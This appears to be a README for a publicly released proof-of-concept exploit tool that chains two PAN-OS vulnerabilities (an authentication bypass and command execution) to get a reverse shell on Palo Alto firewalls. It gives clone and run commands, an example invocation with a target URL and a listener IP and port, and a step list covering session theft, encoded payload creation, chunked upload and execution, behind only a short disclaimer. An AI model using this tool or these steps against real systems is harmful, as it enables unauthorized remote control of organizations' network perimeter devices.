Share
## https://sploitus.com/exploit?id=12AD7FBE-9A82-5661-9E65-B8E03F68B3C3
# ๐Ÿš€ CVE-2024-0012 & CVE-2024-9474 (Palo Alto PAN-OS) Exploit ๐Ÿ”

![Palo Alto PAN-OS](https://img.shields.io/badge/Product-Palo%20Alto%20PAN--OS-blue)
![Exploit Type](https://img.shields.io/badge/Type-RCE%20%7C%20Authentication%20Bypass-yellow)

## ๐Ÿ›ก๏ธ Description

This Proof-of-Concept (PoC) script targeting vulnerabilities in Palo Alto PAN-OS, specifically **CVE-2024-0012** and **CVE-2024-9474** by automating the exploitation process, including autentication bypass, payload creation, chunked delivery, and seamless command execution.


> โš ๏ธ **This script is for educational and authorized penetration testing purposes only. Unauthorized use is illegal.**

---

## ๐Ÿ” Vulnerabilities Addressed
### CVE-2024-0012
- **Type**: Authentication Bypass
- **Impact**: Enables unauthorized access to administrative interfaces.
- **Severity**: ๐Ÿšจ Critical

### CVE-2024-9474
- **Type**: Command Execution & Privilege Escalation
- **Impact**: Allows remote attackers to execute arbitrary commands.
- **Severity**: ๐Ÿ”ฅ Medium

---

## ๐Ÿง‘โ€๐Ÿ’ป Usage
### ๐Ÿ› ๏ธ Clone the Repository
```bash
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC
```

### ๐Ÿš€ Run the Script
```bash
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
```

#### Arguments:
- `<TARGET_URL>`: The target URL, including `http` or `https`.
- `<LISTENER_IP>`: Your IP address for the reverse shell listener.
- `<LISTENER_PORT>`: The port for the reverse shell listener.

---

### ๐Ÿ’ก Example
```bash
python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444
```
---

### ๐Ÿ’ป Exploit Demo
https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5

---

## โš™๏ธ How It Works
Get the full breakdown and technical insights into this PoC from this [Medium Write-up](https://medium.com/@talatumsolutions/breaking-the-firewall-exploiting-pan-os-vulnerabilities-for-unauthenticated-remote-code-execution-23bf79d3f245)!
1. ๐Ÿ” **Checks Vulnerability**: Ensures the target is vulnerable to CVE-2024-0012 and CVE-2024-9474.
2. ๐Ÿ›ก๏ธ **Extracts PHPSESSID**: Retrieves a session ID for further exploitation.
3. โœจ **Generates Payload**: Creates a double-encoded reverse shell payload.
4. ๐Ÿ“ฆ **Uploads Chunks**: Sends payload chunks to the target server.
5. ๐Ÿ”— **Combines Payload**: Reconstructs the payload on the target system.
6. โšก **Executes Command**: Decodes and executes the reverse shell.

---

## โš ๏ธ Legal Disclaimer
This PoC is intended for **educational purposes** and **authorized security testing** only. Unauthorized use of this tool is strictly prohibited. The authors are not responsible for any misuse or damage caused by this tool.

---

## ๐Ÿง‘โ€๐ŸŽ“ Author
[ghostxploiter](https://github.com/itxalee)